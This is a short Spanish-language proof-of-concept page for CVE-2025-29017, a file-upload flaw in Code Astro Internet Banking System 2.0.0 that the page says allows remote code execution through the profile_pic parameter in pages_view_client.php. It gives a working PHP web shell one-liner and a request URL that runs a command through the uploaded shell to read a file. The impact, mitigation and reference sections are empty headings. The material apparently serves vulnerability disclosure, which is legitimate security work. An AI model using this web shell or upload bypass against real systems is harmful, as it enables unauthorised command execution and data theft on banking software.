
Exploit de prueba de concepto para CVE-2025-29017, que demuestra ejecución remota de código mediante la carga de archivos maliciosos en Code Astro Internet Banking System 2.0.0.
Existe una vulnerabilidad de Ejecución Remota de Código (RCE) en Code Astro Internet Banking System 2.0.0 debido a una validación incorrecta de carga de archivos en el parámetro profile_pic dentro de pages_view_client.php. Los atacantes pueden eludir las comprobaciones de seguridad modificando la solicitud de carga, lo que conduce a la ejecución de código arbitrario.
profile_pic en pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impacto
Mitigación
Referencias